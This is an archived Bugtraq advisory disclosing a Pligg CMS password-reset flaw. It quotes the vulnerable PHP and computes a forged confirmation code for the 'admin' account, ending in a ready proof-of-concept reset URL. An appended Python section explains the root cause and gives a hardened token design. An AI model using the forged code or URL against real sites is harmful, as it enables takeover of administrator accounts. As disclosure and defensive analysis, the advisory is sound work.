Bugtraq mailing list archives
Pligg critical vulnerability
From: "242th section" <242th.section () gmail com>
Date: Fri, 25 May 2007 15:03:51 +0200
Pligg critical vulnerability

Concerned version: 9.5 and ?

Description:

Pligg is a flexible CMS based on PHP and MySQL. To reinitialize a forgotten password, Pligg follows a classical process. A confirmation code is generated and sent by email to the concerned user's mailbox. The user has to follow the link containing the confirmation code, and if the confirmation code is checked successfully, the password is reinitialized to a pre-defined value. You can find the part of the source code in charge of this check below:

WEB_ROOT/libs/html1.php:

[…]
function generateHash($plainText, $salt = null)
{
    if ($salt === null) {
        $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
    } else {
        $salt = substr($salt, 0, SALT_LENGTH);
    }
    return $salt . sha1($salt . $plainText);
}
[…]

WEB_ROOT/login.php:

[…]
$confirmationcode = $_GET["confirmationcode"];
if (generateHash($username, substr($confirmationcode, 0, SALT_LENGTH)) == $confirmationcode) {
    $db->query('UPDATE `' . table_users . '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login` = "' . $username . '"');
[…]

Unfortunately, as you can read, you can easily generate, for a given username, a confirmation code that successfully passes the following check:

    if (generateHash($username, substr($confirmationcode, 0, SALT_LENGTH)) == $confirmationcode)

Example:

Let's choose:

    salt = 123456789

and

    username = admin

We have:

    sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7

and thus:

    confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7

With the following URL you can reinitialize the admin user's password:

http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7

242th.section.
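The root cause in the check above is that the confirmation code is self-verifying: the salt is taken from the code itself and the username from the request, so the server recomputes the expected value entirely from attacker-controlled input and nothing secret is involved. The following Python rendering is an added illustration, not Pligg's code and not part of the original post: it mirrors the posted check to show why any salt-prefixed value is accepted, and places a hardened reset-token design next to it (random token, only its digest stored server-side and bound to the user, expiry, constant-time comparison, single use). It assumes SALT_LENGTH is 9, matching the nine-character salt in the post's example; the ResetTokenStore class and its method names are hypothetical.

```python
import hashlib
import hmac
import secrets
import time

# Assumption: Pligg's SALT_LENGTH is 9, matching the 9-character salt
# ("123456789") used in the advisory's example.
SALT_LENGTH = 9


def generate_hash(plain_text: str, salt: str) -> str:
    """Python rendering of Pligg's generateHash() when a salt is supplied:
    the salt is prepended to sha1(salt . plaintext)."""
    salt = salt[:SALT_LENGTH]
    return salt + hashlib.sha1((salt + plain_text).encode()).hexdigest()


def vulnerable_check(username: str, confirmation_code: str) -> bool:
    """The login.php comparison as the advisory shows it.

    Both inputs needed to recompute the expected value (salt and username)
    come from the request, so the check accepts any code built with the
    same public formula. Nothing here depends on state the server holds.
    """
    expected = generate_hash(username, confirmation_code[:SALT_LENGTH])
    return expected == confirmation_code


class ResetTokenStore:
    """Hardened design (hypothetical helper): the reset token is random,
    cannot be derived from public data, and the server keeps only its
    digest, bound to the username and an expiry time."""

    def __init__(self, ttl_seconds: int = 3600):
        self.ttl = ttl_seconds
        self._pending = {}  # username -> (sha256(token) hex, expiry timestamp)

    def issue(self, username: str, now=None) -> str:
        """Create a token for the e-mail link; store only its digest."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._pending[username] = (digest, now + self.ttl)
        return token

    def verify(self, username: str, token: str, now=None) -> bool:
        """Accept a token only if one is pending for this user, it has not
        expired, and its digest matches in constant time. A token is
        consumed on first successful use."""
        now = time.time() if now is None else now
        entry = self._pending.get(username)
        if entry is None:
            return False
        digest, expiry = entry
        if now > expiry:
            del self._pending[username]
            return False
        presented = hashlib.sha256(token.encode()).hexdigest()
        if not hmac.compare_digest(presented, digest):
            return False
        del self._pending[username]  # single use
        return True
```

The hardened path changes what the check depends on: a pending record the server created, not a value recomputable from the URL. Hashing the stored token means a leaked database copy does not yield usable reset links, and the expiry plus single-use consumption bound the window in which an intercepted e-mail is useful.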
Current thread:
- Pligg critical vulnerability 242th section (May 25)
- Re: Pligg critical vulnerability crazy frog crazy frog (May 26)